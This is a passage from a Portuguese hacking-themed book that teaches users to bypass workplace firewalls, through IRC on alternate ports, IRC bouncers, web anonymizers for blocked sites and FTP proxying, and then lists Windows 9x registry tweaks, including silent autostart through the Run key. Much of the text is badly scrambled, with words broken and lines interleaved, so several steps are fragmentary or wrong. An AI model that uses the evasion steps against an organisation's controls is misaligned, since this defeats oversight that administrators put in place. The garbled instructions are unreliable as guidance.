erno, o ponto em que ele volta do mundo
cisaremos de conversores ou desconversores. Um Conversor para tornar nossos dados que saem de inválidos para inválidos; um desconversor para, já na rede externa, transformar
formato convencional, a fim de que o servidor/aplicativo de destino possa entender; uma vez que a aplicação destino respondeu, um reconversor para passar esta resposta como válida
seguirmos entendê-lo.
Na realidade o conversor e desconversor da rede interna, assim como o desconversor e reconversor da rede externa, são um programa só.
No caso IRC; a única coisa que precisamos fazer é acessá-lo por uma porta diferente da que ele está usando (6667).
Na pratica no mirc ou o aplicativo que estiver usando para salas de bate-papo
Na tela de editar o provedor no nosso exemplo aparece assim:
Terrorismo Tecnológico Aprenda Para Sobreviver
251
Pronto é só conectar e o firewall nem percebera nada!
Mas no caso do cliente de IRC, o programa permitia mudar a porta de conexão porém pode ser que não tenhamos esta facilidade no programa que tivermos querendo usar. Aí sim que precisaremos dos conversores!
14.5.1 Enganando o impedimento de sites pornográficos através do nome.
pela web quando aparece a palavra “sexo”.
mas em uma matéria científica, por exemplo, mas mesmo assim o firewall a barra.
14.5 Então vamos lá:
O administrador programou o seu firewall para impedir o acesso
Muito se pode discutir deste método, já que muitas vezes esta palavra aparece em sites sem conteúdo pornográfico,
Neste caso teremos que usar um conversor mas é muito simples pois na Internet a sites que fazem isso automaticamente e assim não precisaremos configurá-lo, esses sites funcionam geralmente para você ficar anônimo na rede ou para traduzir textos, porém acabam funcionando também como conversores como o http://www.anonymizer.com (proteção de privacidade) e http://www.babelfish.com (tradução). A forma de funcionamento básica é: você entra um endereço em um formulário do site, e o site faz todas as requisições HTTP pra você, repassando como se fossem locais dela.
Terrorismo Tecnológico Aprenda Para Sobreviver
252
E pronto conteúdo liberado!
14.5.2 Endereços WWW proibidos por nome.
Todas as transações ocorrem de forma completamente correta para o firewall. O browser web conecta-se no site http://www.anonymizer.com - que é permitido - e o usuário entra um URL no formulário do site: http://www.sexo.com O próprio site do anonymizer faz as requisições para o site pornográfico, assim como carregar todas as figuras. Isto está na rede externa, fora do controle do firewall. E repassa para o cliente com os links modificados, como se fosse uma página local de http://www.anonymizer.com
14.6 Como bloquear então?
ntão se você é o administrador como bloquear? Simploes bloqueie os sites de conversão, pelo menos os mais
w c ww.babe .com
a
E
http://w w.anonymizer. om e http://w lfish
Porém nunc estará 100% segucro o qu
d q
u is r n todo mundo e explicando que não se pode entrar nesses sites e dar bons motivos para que os
rios c , m ç a er d
, a nãã
ser e passe o restoda vida buscan o sites ue façam a onvers o!
É m ito ma fácil i pedi do pra
usuá não a essem e se tiver te po fa a um promessa, pois vai s ifícil!
Terrorismo Tecnológico Aprenda Para Sobreviver
253
14.7 O mais utilizado é o IRC vamo
C e y ido pelo RFC 1459, mas com s e e a te, foi um to
Jarkko Oikarinnen em 1989 para estender o protocouma interface mais poderosa de confe cias e conv l. Trata-se de uma conversação em um ambiente distribuído com
s usuários t l ári s interligados entre si.
Define porta (TCP) acima de 1024 do program6 r i
Com a popularização, o IRC passou a adotar outras portas no servidor: de início, 6667 a 7000; algum tempo depois, perdeu-se o padrão - qualquer porta acima de 1023 era usada para definir um servidor. Como exemplos, temos a rede BrasNET de IRC, brasileira, qu 8000 e 9000, e inúmeras portas “não-oficiais” adotadas pela maioria dos ser
s estudá-lo um pouco mais!
IRvária
- Internxtensõ
t Relas usad
Chas atu
t, definalmen pro colo criado por
lo talk do Unix a ersação virtuarên
vário simul âneos, espa hados por v os servidore
a cliente com a porta 6 67 do p ograma serv dor.
e também utiliza para todos os servidores as portas
vidores, como 4400, 8888 e 31337. Uma lista de servidores com suas respectivas portas pode ser obtida de sites como http://www.irchelp.org.
Vai ser um pouco difícil o administrador ter proibido todas as portas então é só procurar uma, geralmente ele só proíbe a 6667 mesmo.
14.7.1 Mas e se o provedor de IRC só funcionar
ntão temos que usar um servidor PROXY de IRC. Para saber mais sobre o Proxy consulte uma parte só dele, neste mesmo livro!
pela porta 6667?
E
Terrorismo Tecnológico Aprenda Para Sobreviver
254
Um cliente d ll, que seja modificado para oferecer suporte a um proxy de IRC. Na prática, quase todos os clientes de IRC têm esta modificação.
dade - quanto um servidor que o interessado na evasão tenha configurado, na internet, pa
r ouve pela porta 1080, uma porta comum para Proxies de IRC.
O servidor de IRC, na rede externa, que será alcançado pelo Pro
caso do FTP?
O FTP é sem dúvida o mais complicado de todos! E isso se deve, pois é o protocolo mais complexo e complicado do que todos os outros protocolos da Internet. Para começar, envolve duas conexões (uma de dados e uma de controle); depois o cliente também pode ter que fazer papel de “servidor” - quando o cliente pede um arquivo, o servidor diz para ele abrir determinada porta, para então criar uma conexão de dados com o cliente e mandar o arquivo.
ntão a porta pela qual o cliente ouve é aleatória, acima de 1023, e somente será aberta na ocasião da conexão. O Firewall teria que
e IRC, situado dentro do firewa
Um servidor Proxy de IRC, alcançável por uma porta liberada pelo firewall, na rede externa. Consideraremos tanto servidores públicos - que existem com esta exata finali
ra redirecionador suas conexões. (um pequeno detalhe - um proxy de IRC também é chamado de “bouncer”, ou quicador) Consideraremos que o bounce
xy de IRC na porta 6667.
14.8 E no
E
dei ar haver conexões com a rede interna de todas as portas de xusuário.
Terrorismo Tecnológico Aprenda Para Sobreviver
255
Direção Origem Destino Prot. Porta de Origem
Porta de Destino
Bit TCP ACK
Comentário
Dentro Externa Interna TCP >1023 21
Não (*)
Requisição FTP vindo
Fora Interna Externa TCP 21
>1023 Sim Resposta à requisição
Fora Interna Externa TCP
20
>1023 Não (*)
Modo normal, criação de canal de
dados
Dentro Externa Interna TCP >1023 Sim Modo normal, resposta da criação
20 de canal de dados
Dentro Externa(*) criação de canal de
Interna TCP >1023 >1023 Não Modo passivo,
dados
Fora Interna Externa TCP >1023 >1023 Sim Modo passivo, resposta da criação de canal de dados
Fora Interna Externa TCP >1023 21
Não (*)
Requisição de saída de FTP
Dentro Externa Intern21
Resposta à requisição de saída
a TCP >1023 Sim
Den rot Externa Interna TCP
20
>1023 Não (*)
Modo normal, Criação de canal de
dados para requisição de saída
Fora Interna Externa TCP >1023 Sim Modo normal, resposta da criação
da requisição de 20 saída
Fora Interna Externa TCP >1023 >1023 Não (*)
Modo passivo, Criação de canal de
dados para requisição de saída
Dentro Externa Interna TCP >1023 >1023 Sim Modo passivo, resposta da criação
da requisição de saída
Terrorismo Tecnológico Aprenda Para Sobreviver
256
Vejamos no quadro!
(*) => Os pacotes s .
om a maneira de se fazer então é o Proxy, que tem conexão dir a
ubseqüentes virão com ACK ligado
Bte com o servidor FTP, transformar a lista de arquivos em um
documento HTTP, e repassá-lo assim para o cliente.
Não há outra forma! Pelo menos até agora.
Existem muitas outras formas de se enganar o firewall como o http por ppp, e outras mas essas apresentadas são as mais fáceis de se fazer! Porém é só usar a criatividade
e imaginação ssível! para ver o que é po
14.9 Para o Administrador:
Nunca instale um firewall e mande-o configurar com configurações padrão, e mesmo assim não confie totalmente nele já que é facilmente burlavel, basta ter imaginação!
r res a os que conseguirem te enganar!
e maneira alguma quero que isso seja usado para enganar,
È mais fácil educar os usuários que proibir. Além de conseguiultados você não ficará com cara de chato, ou de tolo par
Dpara burlar sistemas, destruir reputações do firewall, só quero é mostrar que eles são falhos e não é prova de segurança nenhuma!
Terrorismo Tecnológico Aprenda Para Sobreviver
258
15.1 O que é o registro do Sistema?
um lugar oculto do Windows onde são armazenadas todas e
qualquer tipo de informação a respeito da configuração de seu sis
15.3 E como ele sabe?
É simples toda a vez que você desliga o seu computador o
sis ma operacional vai ao Registro e atualiza todos os dados até aq
15.4 Então...
É
tema(Win98/95/ME/NT/2000/XP), ou seja, tudo o que é feito é também registrado no Regedit.
15.2 O que acontece? Toda vez que você inicializa o sistema o Windows verifica
todas as configurações possíveis do Registro, como tipo de hardware utilizado, software, configurações adicionais (papel de parede, caminhos de arquivos, registros de softwares, configurações de Internet, arquivos essenciais para inicialização do sistema. Por isso ele também sabe se você acrescentou algum hardware no sistema, ele compara suas tabelas)!
teuele exato momento. Pronto, feito isso até o seu último papel de
parede utilizado é registrado e também tudo aquilo que foi citado acima. Feito isso o usuário já pode desligar o seu computador, e da próxima vez que o sistema for carregado estará tudo no lugar e do jeito que você configurou.
Terrorismo Tecnológico Aprenda Para Sobreviver
259
O regist rado e
modificado. Primeiro você deve ir a INICIAR/EXECUTAR. Execute o arquivo regedit.exe (digite regedit e Enter), abrirá uma janela, agora é
ro do Windows é muito fácil de ser explo
só editar o registro do seu S.O. Umas das ferramentas mais utilizadas é a LOCALIZAR que fica no menu EDITAR, com ela você pode localizar o que quiser e alterar o que quiser.
Vejamos algumas pastas do editor de registro (regedit.exe):
15.4.1 Hkey_Local_Machine Contém informações específicas sobre o tipo de hardware,
software, e outras preferências de um determinado PC. Esta informação é usada para todos os suários que anotam sobre este computad
15.4.2 Hkey_Current_Config
e \Config. Ch q hardware
e pedaços de informações relativo à Tomada do
Sistema e configuração de Jogo. Esta informação é DINÂMICA e
uor.
Esta Chave aponta a uma filial do Hkey_Local_Machinave ue contém informação sobre a configuração de
atual.
15.4.3 Hkey_Dyn_Data
Esta Chave aponta a uma filial de Hkey_Local_Machine qu
contém vários
Terrorismo Tecnológico Aprenda Para Sobreviver
260
significa é
15.4.4 Hkey_Classes_Root
filial de Hkey_Local_Machine que de eve certas colocações de software. Esta Chave contém informação essencial sobre OLE e arrasta e derruba operações, atalho
15.4.5 Hkey_Users
15.4.6 Hkey_Current_User
e hardware or exemplo, pode conter
info o o ma
ração
que pode mudar como dispositivos é somado ouremovido do computador.
Esta Chave aponta a uma scr
s, e aspectos de caroço do Windows 95 GUI.
Esta Chave contém informação sobre os usuários que anotam
sobre o computador. Informação genérica e específica é usada, e cada usuário que usa o sistema tem o próprio Subkey deles/delas.
Esta Chave aponta a uma filial de Hkey_Users para o usuário
que é atualmente anotado sobre o sistema.
15.4.7 Hkey_Local_Machine\Config Contém informações sobre configurações d
alternadas para o computador. Prmação sobre configurações múltiplas pode ser usado quand
computador é conectado a uma rede, quando é undocked de uestação ancorando, e assim por diante. Cada configu
Terrorismo Tecnológico Aprenda Para Sobreviver
261
alternada é nomeada um identificador diferente, e esta configuração ID ave de Config. Cada configuração aparece na lista de perfis de hardware na opção de sistema no Painel de Controle.
l_Machine\Software contém informação de configuração sobre tudos softwares que pode escrever informação no Registro. As entradas nesta chave solicitam qualquer um usando este computador de particular, e inclui definições para associações de arquivo e i ubkey de software con oma quando registrando uma apli
s-
15.4.9 Hkey_Local_Machine\System
Hkey_Local_Machine\System são organizados em jog
os dados que controlam startup é descrito no subHk
informações que controla startup de sis adeia do computador e o subsistema começar. A chave de Serviços contém informações para controlar a con de drives, sistemas de arquivo, e assim por diante. O dados na chave de Serviços também controlam estes serviços e cha
têm um subkey debaixo da ch
15.4.8 Hkey_Local_Machine\Software O subtree de Hkey_Loca
nformação de OLE. O stém, por exemplo, a informação você s
cação para usar uma extensão de filename específica e informação somou durante instalaçãode aplicações Windowbaseadas.
os emO dados de controle que contêm um jogo completo de parâmetros para
os drives de dispositivo e serviços que podem ser carregados com Windows 95. Todos
tree de CurrentControlSet debaixo de ey_Local_Machine\System. Este jogo de controle tem duas
partes: A chave de Controle contém
ma, inclusive o nome de cte
figuração
mam um ao outro.
Terrorismo Tecnológico Aprenda Para Sobreviver
262
5.5 Antes de começar faça um backu1 p
r o BACKUP DO REGISTRO?
r/Executar/Digite: Regedit/Enter. . Na janela do Editor de Registro clique no menu
Re de Registro. . Agora de um nome para o arquivo que irá armazenar toda
o c gestão: Registro). . Marque a opção Todos na caixa intervalo de exportação. . Indique o caminho onde esse arquivo será
armazenado(pode ser qualquer lugar, de preferência um que você não esqueça).
urações estão a salvo.
sta System do Windows os arq uete ou outro lugar qualquer. (Prefiro o 1º método).
15.5.2 Como recuperar o seu REGISTRO caso
Bom, há várias maneiras de realizar a devida restauração do registr
15.5.1 Como faze
Método 1: 1. Clique em Inicia2gistro/Exportar Arquivo3ópia do seu registro. (Su45
6. Clique em OK e pronto, seu Registro está todo seguro. Todas as suas config
Método 2: Uma outra forma é copiar da pauivos System.dat e User.dat, para um disq
seja danificado?
o de seu sistema caso tenha ocorrido algum desastre como instalação de programas inconvenientes, exclusão de chaves ou itens do registro, alteração indevida por parte de usuários não
Terrorismo Tecnológico Aprenda Para Sobreviver
263
autorizados, problemas na inicialização do seu sistema e formatação do disco rígido.
Método 1: Computador ializão, mas acusam
falt ic rrência de o e mais ac
1 m edit/Enter.
Re rt
o e cliq . con g
s
1 o arquivo de Backup e de um clique duplo em cima dele. O seu conteúdo será adicionado ao Registro. (Um dos métodos mais fáceis).
2 r o seu micro.
o do System.dat e User.dat :
se dos devidos arquivos, você deve copiá-los para dentro da pastam System do Windows.
es com o Win95/98/NT que inica ou modif configuraçãontece) :
ação de determinados arquivos ou uma oco desastrosa por parte do próprio usuário(o qu
. Clique e 2. Na janelagistro/Impo
Iniciar/Executar/Digite: Reg
do Editor de Registro clique no menu ar Arquivo de Registro.
3. Busque ue em abrirteúdo do re 4. Reinicie Método 2 : . Localize
. Reinicia
Método 3: Substituiçã
1. Com pos
arquivo de backup que foi criado (se é que foi) O conteúdo desse arquivo será adicionado aoistro danificado.
u computador. e
Terrorismo Tecnológico Aprenda Para Sobreviver
264
2 cro. Método 4: Computadores com o Windows 95 instalado e que não possuem
Ba g
oa ensagem iniciando o Windows 95 tecle
F8. 3. E no
DIGITE: CD C:\WIND
DEP NTES COMANDOS,
. Reiniciar o seu mi
ckup do Re 1. De um b2. Quando
ntre
istro:
ot na máquina e entre no prompt do Dos. parecer a m
prompt do Dos
OWS
OIS DIGITE OS SEGUIPRESSIONANDO ENTER DEPOIS DE CADA.
U R.DA0 CONTÊM O NÚMERO ZERO)
s
a -s
s
s
a
(OBSERVE Q attrib -h -r - ttrib -h -r
attrib -h -r - attrib -h -r - 4. Reinicie
Método 5 :
E SYSTEM.DA0 E USE
system.dat
system.da0
user.dat
user.da0
máquina.
Terrorismo Tecnológico Aprenda Para Sobreviver
265
Computadores com o Windows 98 instalado e que não possuem Backup do Registro:
1. De um boot na máquina.
enu de inicializações do Windows 98.
s
S : lização do sistema
Scanreg/Res s sem
problemas. Ele é a melhor maneira
O pr r preciso realizar a restauração dos Arquivos do o odas as
o nome da Lixeira
F040-5081-101B-9F08-
2. Tecle CT
3. Escolha4. Digite :
canreg/fix
RL até que apareça o m
omente prompt de comando.
se quiser restaurar a cópia da última inicia.
tore: se optar por datas de inicializaçõe oferece 4 opções de datas .(Para mim essa).
bs : Sem
seu Registr alterações s
e que fo você deverá reinicializar o sistema para que t
ejam reconhecidas.
15.6 Dicas:
Mudando a- Abra o RegEdit (regedit.exe) b- Localize por: {645F00AA002F954E}; c- Dê dois clicks em padrão e ALTERE O NOME...
Tirando itens drão dpa a
Área de Trabalho
os items de sua área de Quando o Win95 é
a- Abra o regedit.exe b- Vá para seguinte pasta: Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace] c- Lá você encontrarátrabalho. d- Remova os que você quiser e PRONTO...
Terrorismo Tecnológico Aprenda Para Sobreviver
266
ins ,
icon ue você não consegue
remover da
tra ,
c
removê-los
cuperá-lo... talado
ele cria es q
área de balho
que é o caso da lixeira, meu
omputador, caixa de entrada... Se você
quer
siga os passos abaixo:
MAS LEMBREM-SE: se você remover algum ítem, não será mais possível re
Adicionan
dicas do dia para a entrada
do
NT.
do novas
Win95/98/
\Software\Microsoft\
ra é só adicionar assim: c- Click no lado direito com o botão direito do mouse e selecione: novo e depois valor de sequência d- Numere-o (como 51, se adicionar outro, 52 e assim por diante...) e- Depois de um duplo click em DADOS e escreva a dica...
a - Abra o regedit.exe b- Abra a seguinte pasta: H_KEY_LOCAL_MACHINEWindows\ CurrentVersion\explorer\Tips e pronto ago
Alterando a- Abra no regedit:
Terrorismo Tecnológico Aprenda Para Sobreviver
267
o sistema de 16-bit
(nomes para 32-bit
longos em qualquer
ou 32 bit). A
tipo us
HKEY_LOCAL_MACHINE\System\CurrentContr
com
que 0 (zero) como valor binário completo. arquivo de qualquer software sendo 16
quelesnomes do
Me~documen
tos.
olSet\ Control\FileSystem b- Dê um duplo click no lado direito da telao botão direito do mouse c- Escolha novo, valor binário d- Nomeie-o de: NameNumericTail e dê enter e- Dê um duplo click no valor que você criou e colof- Click Ok e reinicie o Windows.
Aumente a
velocidade do menu
INICIAR.
ra seguinte pasta: top
ito da tela, click com o botão
EQUÊNCIA. d- Nomeie esse valor de MenuShowDelay e mude seu valor para um número de 1 à 10 (1 é o mais rápido).
a- Abra o regedit.exe b- Vá paHKEY_CURRENT_USER\Control Panel\deskc- No lado diredireito do mouse, escolha NOVO, depois VALOR DE S
M
defa de usuários e empresas.
a- Abra o regedit.exe b- Abra HKEY_CURRENT_USER\Software\Microsoft\MS SETUP (ACME); c- Você notará que no lado direito da tela tem os
quência: DefCompany
udando nomes
ult
seguintes valores de se(empresa de ou de compania) DefName (Nome de registro)
Terrorismo Tecnológico Aprenda Para Sobreviver
268
- Para alterá-los basta dar dois clicks em cada..
.
MUDE OS
WINDOWS (Versão,
RO
dificar os ítems, basta dar dois clicks obre eles...
DADOS DO
NOME, OEM .
a- Abra o regedit.exe b- Vá em: HKEY_LOCAL_MACHINE\SOFTWARE\MICSOFT\JANELAS\CURRENT version c- Você notará que do lado direito da tela, existem vários valores... Mude os que você achar conveniente... - Para mos
Mudando
Meu Computad
or.
o ícone do a- Abra o regedit.exe b- Mande localizar pelo nome: Meu Computador c- Aperte o TAB para ir para a chave binária e dê um duplo click na mesma... d- vá para default icon e do lado direito da tela aparecerá o local do ícone, é só trocar o endereço para o que tem o ícone desejado.
Se você deseja
que rograma sejam
s ao
Windows
ps
executado
iniciar o
sem que apareça
I
a- Abra o regedit.exe b- Vá para a seguinte pasta: HKEY_CURRENT_USER\Software\Microsoft\Windows\CURRENT_VERSION\RUN c- Adicione um novo valor de sequência do lado direito da tela, dando um click com o botão direito do mouse e escolhendo NOVO. Digite algum nome parecido com o programa. d- Depois de ter nomeado, de um duplo click em
dereço completo do
no menu NICIAR.
DADOS e coloque o enarquivo.
Se você deseja
com FIXO
deixar um diretório
bra o regedit.exe
EY_CURRNT_USER\Software\Microsoft\Curr
a- Ab- Abra a seguinte pasta: HKent_Version\Explorer\User Shell Folders c- Criem um novo valor de sequência como
Terrorismo Tecnológico Aprenda Para Sobreviver
269
para
documentsalvar seu
os e quer que todos
d
mandem salvar
diretamente nele, faça o
s
de: Personal e- e edite seus dados colocando o edereço da
os editores e texto e
etc...
eguinte.
explicado no ítem acima. d- Nomeie-o
pasta desejada para se tornal DEFAULT
Desligando a
nimaçãodas
a
janelas Você pode desligar a a
quando
minimiza
ma za
a ela da
eie e
animação) ou 1 rogramas e
nimação mostrada
você
ou ximi
janelas.
Abra RegEdit e selecione . HKEY_CURRENT_USER, Control panel, Desktop, WindowMetrics . Aperte o botão ddireita do mouse num espaço vazio na jandireita. . Selecione new, string value . Renomo novo valor para MinAnimate . Dê duplo cliquem MinAnimate e entre 0 (desliga (liga) . Feche Regedit e todos os preboot.
DICA especial: SE VOCÊ
QUER QUE NÃO
seu computador e então não terá
... se quiser APAREÇA
MAIS
1- ABRA O msdos.sys no editor do msdos2- Procure pela seção [opções] 3- Acrecente a seguinte linha a essa seção: logo=0 4- Reinicieaquela tela... Lembre-se que o padrão é "Logo1"
Terrorismo Tecnológico Aprenda Para Sobreviver
270
AQUELA ELA
CHATA DO
INICIAR
SEGUINTE:
T
WIN95 AO
FAÇA O
tornar a essa opção. re
Você já
pe ,
quando
d mouse em
cima de algum
ícone na desktop,
quase que
janela de
a
ícone faz.
m
regedit.exe
1-101B-9F08-0AA002F954E}, após isso, você verá que do
ip, dê dois clicks no
foTip e modifique-o, depois para conferir é so
s que tem esse InFoTip, e os
andando colocar m novo valor de sequência e nomeando-o de
deve ter rcebidoque
você eixa o
aparece
uma
help marela
disendo o que
aquele
Se você deseja odificar o mini
- Entre no -Mande, por exemplo, localizar a chave da lixeira: {645FF040-5080lado direiro da tela, existem dois valores, um é oPadrão e o outro é o InfoTInir ao desktop, deixar a lixeira selecionada e deixar o mouse sobre ela... Você pode fazer issocom todos os íconeque não tiver, é só você criar, muInfoTip...
Terrorismo Tecnológico Aprenda Para Sobreviver
271
help desses
faça o uin
ícones,
seg te: Acabe
rompt deLogoff.
Aquele do
com o P
menu
Logoff de
1. Execute o registro 2. Abra as pastas na sequência: Meu Computador/HKEY_CURRENT_USER\Sotware\Mi
omo : NoLogoff. Pressione enter e defina o seguinte valor : 01 00 00 00. Pronto, de um boot.
iniciar Efetuar
<Nome-do-
usuário>
crosoft\Windows\CurrentVersion\Polices\Explorer. Escolha Editar|Novo\Valor Binário. Nomeia a nova entrada c
Acabe
favoritos nIniciar .
1. Abra o editor de Registro. 2. Abra as pastas na sequência: Meu Computador/HKEY_CURRENT_USER\Sotware\Mi crosoft\Windows\CurrentVersion\Polices\Explorer. Escolha Editar|Novo\Valor DWORD. Nomeia a nova entrada como : NoFavoritesMenu. Pressione enter e defina o seguinte valor : 01 00 00 00. Pronto, de um boot.
com o menu
o Menu
Recebe mensagens do tipo
Found ? Site Not
1. Abra o editor de Registro. 2. Abra as pastas na sequência HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\VXD\MSTCP. Escolha Editar|Novo\Valor da Sequencia. Nomeia a nova entrada como : DefaultTTL Clique com o botão direito do mouse sobre a nova entrada e escolha modificar e digite 64.
Eliminar 1. Abra o editor de Registro.
Terrorismo Tecnológico Aprenda Para Sobreviver
272
p
i
2. Abra as pastas na sequência HKEY_CURRENT_MACHINE\Software\Microsoft\Windows\CURRENT_VERSION\RUN
have. Você pode até mesmo rá
rogramas que
nsistem em
aparecer na
incialização do
Windows .
Verifique se existem nomes suspeitos de programas nessa cdeletar todos esses arquivos, o windows teuma inicialização mais rápida . Vela também : RunOnce, RunOnceEx, RunServices e subkeys de RunServiceOnce. De um clique duplo em cima deles e verá a sua localização e para quais programas eles apontam.
O CD dos P
Cds e
registro
w com
programas case sempre
indesejáveis,
vejamos como
eliminá-los
manualmente .
. Abra o editor de Registro
t\IEveXFiles.
A
ACHINE\Software\Microsoft\A
CHINE\Software\Microsoft\IE
osoft\Anfo.
soft\A
soft\A
rovedores . Estes
ntopem o
do indows
12. Apague as seguintes chaves : HKEY_LOCAL_MACHINE\Software\Microsof4\SETUP\Acti HKEY_LOCAL_MACHINE\Software\Microsoft\ctiveSetup\Chanels. HKEY_LOCAL_MctiveSetup\ComponentProgress\IE4. HKEY_LOCAL_MA4\Options HKEY_LOCAL_MACHINE\Software\MicrctiveSetup\InstallI HKEY_LOCAL_MACHINE\Software\MicroctiveSetup\Jobs\Job.IE4. HKEY_LOCAL_MACHINE\Software\MicroctiveSetup\Installed\Componentes\>{60B49E34C7CC-11D0-8953-00A0C90347FF}UOL3456UOL
Terrorismo Tecnológico Aprenda Para Sobreviver
273
Página Inicial. Você
poderá altear a página icial do seu
navegador.
\Software\Microsoft\Int
in
HKEY_LOCAL_MACHINEernet Explorer\Main.
Arquivos
stes Cds de
rovedores de
acesso
C:\Windows\System\Homepage.inf
cópias.
Intrusos que são
instalados no seu
compotador por
C:\Windows\System\Iedkcs32.dll C:\Windows\System\User.dat C:\Windows\System\Wavemix.ini Faça um backup desses arquivos antes de instalar esses Cds de provedores depois é só restaurar a configuração original com essas
e
p
sem a sua permição.
Modificar a or
d
tentou instalar
um
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi n\Setup\SourcePath.
s igen os
oEstando aí é só mudar o endereço dos arquivode instalação.
arquvos de
configuração.
Alguma vez já
Terrorismo Tecnológico Aprenda Para Sobreviver
274
componente do
Windows ou algúm he ele te erguntou caminho
de instalação
do Windows
? Veja
ardware
pa
dos arquivos
como mudar.
Você rola atela do
HKEY_LOCAL_USER\Software\Microsoft\Office\8.0\Word\
Word e nãao sabe on
vai Mude isso
Options. Escolha Editar|Novo\Valor da Sequencia. Nomeia a nova en como : LiveScrooling
1. Da próxima vez que tentar rolar a barra num
de ela parar ?
trada Clique com o botão direito do mouse sobre a nova entrada e escolha modificar o valor e digite
. arquivo grande o deslize será bem suave e gradativo.
Adicionar
Controle ao seu menu
a- Dê um click com o botão direito do mouse sob
menu iniciar; c- Dê um click com o botão direito do mouse em qualquer parte branca do lado direito da tela;
f- Troque o nome "NOVA PASTA" para o
um Painel de
o botão iniciar e escolha EXPLORAR; b- O explorer abrirá visualizando a pasta do
iniciar.
d- Escolha "NOVO" e depois "PASTA"; e- Com isso você criou uma pasta chamada: "NOVA PASTA";
Terrorismo Tecnológico Aprenda Para Sobreviver
275
seguinte código bi (ou se ja escreva tudo que está a seguir
Controle.{21EC2020-3AEA-1069-A2DD-08002B30309D}
GOSTOU??? Você pode fazer isso com qualquer coisa, Meu Computador, Rede Dial-up,
você ter o código binário correto... Como conseguir esses códigos (e muitos outros...)? -
nário
IGUALZINHO...) : Painel de
g- Quando acabar aperte enter. h- Feche o explorer e abra o menu iniciar clickando no botão iniciar...
Impressoras... Basta
Abra o regedit.exe vá em EDITAR, LOCALIZAR e localize por: 21EC2020. ele lhe dará uma lista de VÁRIOS.
Retirando a tela inicial (logo)
15.7 Dicas de Windows Na Internet você poderá achar muito mais dicas de Windows,
estão repletas delas em sites, de hackers, e no próprio site da Microsoft. Uma outra forma é você ler um livro de Windows, mas boa parte dele só vai te enrrolar e não ensinar nada, veja só muitas coisas que da para fazer com o win e que provavelmente você nem sabia, é uma reunião do que tem de mais interessante nesses sites.
15.7.1
Terrorismo Tecnológico Aprenda Para Sobreviver
276
Retire a imagem que aparece ao iniciar o Windows 95 colocando a linha logo=
clique no botão "X" da primeira janela que você quiser fechar. Todas as janelas precedentes serão fechadas.
15.7.3 Abrindo sub-folders
a
tecla ALT e dê um duplo clique ne .
15.7.4 Apagando um arquivo sem mandar para Recycle (lixeira)
T ao apagar um arquivo ele não será andado para o Recycle ao ser apagado.
15.7.5 Diretório de Startup
0 na seção [options] do arquivo MSDOS.SYS.
15.7.2 Fechando múltiplas janelas abertas
Para fechar múltiplas janelas abertas ao explorar Meu
Computador, aperte SHIFT e
Para ver as propriedades de um determinado objeto, aperte le
Se você apertar a tecla SHIFm
Para executar um programa sempre que iniciar o Windows, coloque um shortcut dele no diretório \windows\Start Menu\Programs\Startup.
Terrorismo Tecnológico Aprenda Para Sobreviver
277
15.7.6 Explorer não mostra todos os arquivos
Se o Explorer não mostra as ensões de alguns arquivos, sel s
r file types that are registered"
15.7.10 Forçando copiar ou mover
Se o Explorer não mostra todos os arquivos de um diretório, selecione View/Options e marque "Show all files".
15.7.7 Explorer não mostra as extensões de alguns arquivos
extecione View/Options e desmarque "Hide MS-DOS file extension
fo
15.7.8 Tocando CD automaticamente
O Windows 95, por default sempre toca automaticamente o CD que é colocado no CD-ROM. Para alterar isto, abra o menu View no Explorer, selecione Options e então File Type. Procure Audio CD e selecione Edit...Retire a opção /play da linha de aplicação usada.
15.7.9 Arrastando objetos com botão da direita Arrastar objetos usando o botão da direita funciona do mesmo modo que usando o botão da esquerda, só que aparece um menu onde você pode selecionar se que copiar, mover ou criar um shortcut do objeto.
Terrorismo Tecnológico Aprenda Para Sobreviver
278
Arrastar um objeto com o botão da esquerda não funciona da mesm ivo e um folder para outro em um mesmo disco, ele será movido. Se o lder de destino for em outro disco o arquivo será copiado. Se o
piar, aparecerá um (+) junto ao cursor. Ao mover, ada aparecerá e quando for criado um shortcut, aparecerá uma
seta junto
Em seguida, selecione o folder d tino, clique o botão da direita sobre ele e selecione paste.
15.7.12 Desliga do o NumLock
a maneira sempre. Por exemplo, se você arrasta um arqudfoarquivo arrastado for executável, o que será transferido será um shortcut do arquivo. Para forçar a cópia de um arquivo, aperte CTRL ao arrastar o arquivo. Para forçar a movimentação do arquivo, aperte SHIFT ao arrastar o arquivo. Lembre-se de soltar a tecla do mouse antes de soltar o CTRL ou SHIFT. Em qualquer dos casos é interessante observar o cursor para verificar o que ele está
zendo. Ao cofan
ao cursor.
15.7.11 Copiando e movendo arquivos Clique o botão da direita no arquivo ou folder que você deseja copiar ou movimentar e selecione cut para movimentar ou copy para copiar.
e des
n
Por default o Windows 95 deixa o NumLock ligado. Para que ele fique desligado coloque a linha "numlock=off" no CONFIG.SYS.
15.7.13 Verifivando o tamanho de um folder
Terrorismo Tecnológico Aprenda Para Sobreviver
279
Para saber o tamanho total de um folder (incluindo sub-folders) verifique suas propriedades (botão direito, propriedades ou ALT-ENTER ou ALT-Duplo clique)
15.7.14 Modificando os logos do Win95 Você pode modificar os logos a resentados ao entrar ou sair do Win95. Crie figuras no formato amanho 320x400, 256 cores 95),
gow.sys (ao ser dado o shutdown) e logos.sys (quando pronto ra desligar). Coloque estes arquivos na raiz do disco de boot.
marcar um texto e guardá-l . Faça o seguinte: segure hift e use as setas do teclado para marcar o texto - ou use o botão reito do mouse - você pode selecionar partes de um texto, linhas
ito este recurso durante programação ou quando e tou nos chats.
15.7.16 Acelere o D o seu Windows 95
omputing fazendo isso você terá um aumento de desempenho da rdem de 10%. A Microsoft nunca foi boa em desenvolver drivers
para seus sistemas operacionais, e os drivers dos fabricantes em
p*.bmp no t
, e dê os nomes de logo.sys (apresentado ao entrar no Winlopa
15.7.15 Recortar,marcar e colar
Uma dica muito interessante e útil, e que eu uso o tempo todo, é o na memória
Sdiou apenas palavras. Estando o texto selecionado segure Ctrl e aperte shift, agora o texto está na memória e pode ser colado em qualquer programa usando shift+insert. Eu uso mu
s
esempenho d
Para aumentar o desempenho do seu Windows 95 troque os drivers gráficos padrões do Windows 95 para os novos drivers mais recentes dos fabricantes de sua placa gráfica. Segundo a Windows Co
Terrorismo Tecnológico Aprenda Para Sobreviver
280
su devemos levar em conta tes de hardware tiveram
